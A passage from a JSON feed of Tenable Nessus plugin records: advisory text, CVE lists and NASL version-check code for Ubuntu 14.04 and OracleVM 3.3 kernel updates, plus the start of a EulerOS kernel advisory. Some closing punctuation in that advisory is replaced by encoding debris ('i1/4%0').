a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Linux kernel (Vivid HWE) vulnerabilities (USN-2932-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2069", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc-e500mc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc64-emb", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc64-smp", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts"], "id": "UBUNTU_USN-2932-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2932-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89937);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2013-4312\",\n \"CVE-2015-7566\",\n \"CVE-2015-7833\",\n \"CVE-2015-8767\",\n \"CVE-2016-0723\",\n \"CVE-2016-2069\",\n \"CVE-2016-2384\",\n \"CVE-2016-2543\",\n \"CVE-2016-2544\",\n \"CVE-2016-2545\",\n \"CVE-2016-2546\",\n \"CVE-2016-2547\",\n \"CVE-2016-2548\",\n \"CVE-2016-2549\",\n \"CVE-2016-2782\",\n \"CVE-2016-3134\"\n );\n script_xref(name:\"USN\", value:\"2932-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Linux kernel (Vivid HWE) vulnerabilities (USN-2932-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's\ntranslation lookaside buffer (TLB) handling of flush events. A local\nattacker could use this to cause a denial of service or possibly leak\nsensitive information. (CVE-2016-2069)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2932-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc-e500mc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc64-emb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19.0-56-powerpc64-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar kernel_mappings = {\n '14.04': {\n '3.19.0': {\n 'generic': '3.19.0-56',\n 'generic-lpae': '3.19.0-56',\n 'lowlatency': '3.19.0-56',\n 'powerpc-e500mc': '3.19.0-56',\n 'powerpc-smp': '3.19.0-56',\n 'powerpc64-emb': '3.19.0-56',\n 'powerpc64-smp': '3.19.0-56'\n }\n }\n};\n\nvar host_kernel_release = get_kb_item_or_exit('Host/uname-r');\nvar host_kernel_version = get_kb_item_or_exit('Host/Debian/kernel-version');\nvar host_kernel_base_version = get_kb_item_or_exit('Host/Debian/kernel-base-version');\nvar host_kernel_type = get_kb_item_or_exit('Host/Debian/kernel-type');\nif(empty_or_null(kernel_mappings[os_release][host_kernel_base_version][host_kernel_type])) audit(AUDIT_INST_VER_NOT_VULN, 'kernel ' + host_kernel_release);\n\nvar extra = '';\nvar kernel_fixed_version = kernel_mappings[os_release][host_kernel_base_version][host_kernel_type];\nif (deb_ver_cmp(ver1:host_kernel_version, ver2:kernel_fixed_version) < 0)\n{\n extra = extra + 'Running Kernel level of ' + host_kernel_version + ' does not meet the minimum fixed level of ' + kernel_fixed_version + ' for this advisory.\\n\\n';\n}\n else\n{\n audit(AUDIT_PATCH_INSTALLED, 'Kernel package for USN-2932-1');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n var cve_list = make_list('CVE-2013-4312', 'CVE-2015-7566', 'CVE-2015-7833', 'CVE-2015-8767', 'CVE-2016-0723', 'CVE-2016-2069', 'CVE-2016-2384', 'CVE-2016-2543', 'CVE-2016-2544', 'CVE-2016-2545', 'CVE-2016-2546', 'CVE-2016-2547', 'CVE-2016-2548', 'CVE-2016-2549', 'CVE-2016-2782', 'CVE-2016-3134');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-2932-1');\n }\n else\n {\n extra = extra + ksplice_reporting_text();\n }\n}\nif (extra) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-27T14:36:49", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - nfsd: stricter decoding of write-like NFSv2/v3 ops (J.\n Bruce Fields) [Orabug: 25986990] (CVE-2017-7895)\n\n - fnic: Update fnic driver version to 1.6.0.24 (John Sobecki) [Orabug: 24448585]\n\n - xen-netfront: Rework the fix for Rx stall during OOM and network stress (Dongli Zhang) [Orabug: 25450703]\n\n - xen-netfront: Fix Rx stall during network stress and OOM (Dongli Zhang) [Orabug: 25450703]\n\n - ipv6: Skip XFRM lookup if dst_entry in socket cache is valid (Jakub Sitnicki)\n\n - uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug:\n 25549809]\n\n - ksplice: add sysctls for determining Ksplice features.\n (Jamie Iles) \n\n - signal: protect SIGNAL_UNKILLABLE from unintentional clearing. (Jamie Iles) [Orabug: 25549809]\n\n - VSOCK: Fix lockdep issue. (Dongli Zhang) [Orabug:\n 25559937]\n\n - VSOCK: sock_put wasn't safe to call in interrupt context (Dongli Zhang) [Orabug: 25559937]\n\n - IB/CORE: sync the resouce access in fmr_pool (Wengang Wang) [Orabug: 25677469]\n\n - KVM: x86: fix emulation of 'MOV SS, null selector' (Paolo Bonzini) [Orabug: 25719675] (CVE-2017-2583) (CVE-2017-2583)\n\n - ext4: validate s_first_meta_bg at mount time (Eryu Guan) [Orabug: 25719738] (CVE-2016-10208)\n\n - sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo Ricardo Leitner) [Orabug: 25719810] (CVE-2017-5986)\n\n - tcp: avoid infinite loop in tcp_splice_read (Eric Dumazet) [Orabug: 25720813] (CVE-2017-6214)\n\n - lpfc cannot establish connection with targets that send PRLI under P2P mode (Joe Jin) [Orabug: 25759083]\n\n - USB: visor: fix null-deref at probe (Johan Hovold) [Orabug: 25796594] (CVE-2016-2782)\n\n - ipc/shm: Fix shmat mmap nil-page protection (Davidlohr Bueso) [Orabug: 25797012] (CVE-2017-5669)\n\n - vhost: actually track log eventfd file (Marc-André Lureau) [Orabug: 25797052] (CVE-2015-6252)\n\n - xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder (Andy Whitcroft) [Orabug: 25814663] (CVE-2017-7184)\n\n - xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window (Andy Whitcroft) [Orabug: 25814663] (CVE-2017-7184)\n\n - KEYS: Remove key_type::match in favour of overriding default by match_preparse (Aniket Alshi) [Orabug:\n 25823962] (CVE-2017-2647) (CVE-2017-2647)\n\n - USB: whiteheat: fix potential null-deref at probe (Johan Hovold) [Orabug: 25825105] (CVE-2015-5257) (CVE-2015-5257)\n\n - udf: Check path length when reading symlink (Jan Kara) [Orabug: 25871102] (CVE-2015-9731)\n\n - udp: properly support MSG_PEEK with truncated buffers (Eric Dumazet) [Orabug: 25876655] (CVE-2016-10229)\n\n - block: fix use-after-free in seq file (Vegard Nossum) [Orabug: 25877530] (CVE-2016-7910)\n\n - Revert 'fix minor infoleak in get_user_ex' (Brian Maly) [Orabug: 25790392] (CVE-2016-9644)\n\n - net: ping: check minimum size on ICMP header length (Kees Cook) [Orabug: 25766911] (CVE-2016-8399)\n\n - ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) [Orabug: 25765776] (CVE-2016-10142)\n\n - sg_write/bsg_write is not fit to be called under KERNEL_DS (Al Viro) [Orabug: 25765445] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) [Orabug: 25751996] (CVE-2017-7187)", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0105)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5257", "CVE-2015-6252", "CVE-2015-9731", "CVE-2016-10088", "CVE-2016-10142", "CVE-2016-10208", "CVE-2016-10229", "CVE-2016-2782", "CVE-2016-7910", "CVE-2016-8399", "CVE-2016-9644", "CVE-2017-2583", "CVE-2017-2647", "CVE-2017-5669", "CVE-2017-5986", "CVE-2017-6214", "CVE-2017-7184", "CVE-2017-7187", "CVE-2017-7895"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2017-0105.NASL", "href": "https://www.tenable.com/plugins/nessus/100237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0105.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100237);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5257\", \"CVE-2015-6252\", \"CVE-2015-9731\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-10208\", \"CVE-2016-10229\", \"CVE-2016-2782\", \"CVE-2016-7910\", \"CVE-2016-8399\", \"CVE-2016-9644\", \"CVE-2017-2583\", \"CVE-2017-2647\", \"CVE-2017-5669\", \"CVE-2017-5986\", \"CVE-2017-6214\", \"CVE-2017-7184\", \"CVE-2017-7187\", \"CVE-2017-7895\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0105)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - nfsd: stricter decoding of write-like NFSv2/v3 ops (J.\n Bruce Fields) [Orabug: 25986990] (CVE-2017-7895)\n\n - fnic: Update fnic driver version to 1.6.0.24 (John\n Sobecki) [Orabug: 24448585]\n\n - xen-netfront: Rework the fix for Rx stall during OOM and\n network stress (Dongli Zhang) [Orabug: 25450703]\n\n - xen-netfront: Fix Rx stall during network stress and OOM\n (Dongli Zhang) [Orabug: 25450703]\n\n - ipv6: Skip XFRM lookup if dst_entry in socket cache is\n valid (Jakub Sitnicki)\n\n - uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug:\n 25549809]\n\n - ksplice: add sysctls for determining Ksplice features.\n (Jamie Iles) \n\n - signal: protect SIGNAL_UNKILLABLE from unintentional\n clearing. (Jamie Iles) [Orabug: 25549809]\n\n - VSOCK: Fix lockdep issue. (Dongli Zhang) [Orabug:\n 25559937]\n\n - VSOCK: sock_put wasn't safe to call in interrupt context\n (Dongli Zhang) [Orabug: 25559937]\n\n - IB/CORE: sync the resouce access in fmr_pool (Wengang\n Wang) [Orabug: 25677469]\n\n - KVM: x86: fix emulation of 'MOV SS, null selector'\n (Paolo Bonzini) [Orabug: 25719675] (CVE-2017-2583)\n (CVE-2017-2583)\n\n - ext4: validate s_first_meta_bg at mount time (Eryu Guan)\n [Orabug: 25719738] (CVE-2016-10208)\n\n - sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo\n Ricardo Leitner) [Orabug: 25719810] (CVE-2017-5986)\n\n - tcp: avoid infinite loop in tcp_splice_read (Eric\n Dumazet) [Orabug: 25720813] (CVE-2017-6214)\n\n - lpfc cannot establish connection with targets that send\n PRLI under P2P mode (Joe Jin) [Orabug: 25759083]\n\n - USB: visor: fix null-deref at probe (Johan Hovold)\n [Orabug: 25796594] (CVE-2016-2782)\n\n - ipc/shm: Fix shmat mmap nil-page protection (Davidlohr\n Bueso) [Orabug: 25797012] (CVE-2017-5669)\n\n - vhost: actually track log eventfd file\n (Marc-André Lureau) [Orabug: 25797052]\n (CVE-2015-6252)\n\n - xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size\n harder (Andy Whitcroft) [Orabug: 25814663]\n (CVE-2017-7184)\n\n - xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL\n replay_window (Andy Whitcroft) [Orabug: 25814663]\n (CVE-2017-7184)\n\n - KEYS: Remove key_type::match in favour of overriding\n default by match_preparse (Aniket Alshi) [Orabug:\n 25823962] (CVE-2017-2647) (CVE-2017-2647)\n\n - USB: whiteheat: fix potential null-deref at probe (Johan\n Hovold) [Orabug: 25825105] (CVE-2015-5257)\n (CVE-2015-5257)\n\n - udf: Check path length when reading symlink (Jan Kara)\n [Orabug: 25871102] (CVE-2015-9731)\n\n - udp: properly support MSG_PEEK with truncated buffers\n (Eric Dumazet) [Orabug: 25876655] (CVE-2016-10229)\n\n - block: fix use-after-free in seq file (Vegard Nossum)\n [Orabug: 25877530] (CVE-2016-7910)\n\n - Revert 'fix minor infoleak in get_user_ex' (Brian Maly)\n [Orabug: 25790392] (CVE-2016-9644)\n\n - net: ping: check minimum size on ICMP header length\n (Kees Cook) [Orabug: 25766911] (CVE-2016-8399)\n\n - ipv6: stop sending PTB packets for MTU < 1280 (Hagen\n Paul Pfeifer) [Orabug: 25765776] (CVE-2016-10142)\n\n - sg_write/bsg_write is not fit to be called under\n KERNEL_DS (Al Viro) [Orabug: 25765445] (CVE-2016-10088)\n\n - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter\n chang) [Orabug: 25751996] (CVE-2017-7187)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2017-May/000727.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.18.2.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.18.2.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-19T12:22:55", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - In the Linux kernel through 4.19, a use-after-free can occur due to a race condition between fanout_add from setsockopt and bind on an AF_PACKET socket. This issue exists because of the 15fe076edea787807a7cdc168df832544b58eba6 incomplete fix for a race condition. The code mishandles a certain multithreaded case involving a packet_do_bind unregister action followed by a packet_notifier register action. Later, packet_release operates on only one of the two applicable linked lists. The attacker can achieve Program Counter control.(CVE-2018-18559i1/4%0\n\n - The acpi_ns_terminate() function in drivers/acpi/acpica/nsutils.c in the Linux kernel before 4.12 does not flush the operand cache and causes a kernel stack dump. A local users could obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-11472i1/4%0\n\n - Race condition in net/packet/af_packet.c in the Linux kernel allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a multithreaded application that makes PACKET_FANOUT setsockopt system calls.(CVE-2017-6346i1/4%0\n\n - Multiple race conditions in ipc/shm.c in the Linux kernel before 3.12.2 allow local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via a crafted application that uses shmctl IPC_RMID operations in conjunction with other shm system calls.(CVE-2013-7026i1/4%0\n\n - An issue was discovered in the Linux kernel. A NULL pointer dereference and panic in hfsplus_lookup() in the fs/hfsplus/dir.c function can occur when opening a file (that is purportedly a hard link) in an hfs+ filesystem that has malformed catalog data, and is mounted read-only without a metadata directory.(CVE-2018-14617i1/4%0\n\n - The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint.(CVE-2016-2782i1/4%0\n\n - An information-exposure flaw was found in the Linux kernel where the pcpu_embed_first_chunk() function in mm/percpu.c allows local users to obtain kernel-object address information by reading the kernel log (dmesg).\n However, this address is not static and cannot be used to commit a further attack.(CVE-2018-5995i1/4%0\n\n - Buffer overflow in net/ceph/auth_x.c in Ceph, as used in the Linux kernel before 3.16.3, allows remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a long unencrypted auth ticket.(CVE-2014-6416i1/4%0\n\n - It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.Note: The CVE-2014-4699 issue only affected systems using an Intel CPU.(CVE-2014-4699i1/4%0\n\n - The snd_compr_tstamp function in sound/core/compress_offload.c in the Linux kernel through 4.7, as used in Android before 2016-08-05 on Nexus 5 and 7 (2013) devices, does not properly initialize a timestamp data structure, which allows attackers to obtain sensitive information via a crafted application, aka Android internal bug 28770164 and Qualcomm internal bug CR568717.(CVE-2014-9892i1/4%0\n\n - A flaw was found in the way the Linux kernel's ext4 file system handled the 'page size i1/4z block size' condition when the fallocate zero range functionality was used. A local attacker could use this flaw to crash the system.(CVE-2015-0275i1/4%0\n\n - An information leak flaw was found in the way the Linux kernel's ISO9660 file system implementation accessed data on an ISO9660 image with RockRidge Extension Reference (ER) records. An attacker with physical access to the system could use this flaw to disclose up to 255 bytes of kernel memory.(CVE-2014-9584i1/4%0\n\n - The pivot_root implementation in fs/namespace.c in the Linux kernel through 3.17 does not properly interact with certain locations of a chroot directory, which allows local users to cause a denial of service (mount-tree loop) via . (dot) values in both arguments to the pivot_root system call.(CVE-2014-7970i1/4%0\n\n - arch/x86/kvm/emulate.c in the Linux kernel before 4.8.12 does not properly initialize Code Segment (CS) in certain error cases, which allows local users to obtain sensitive 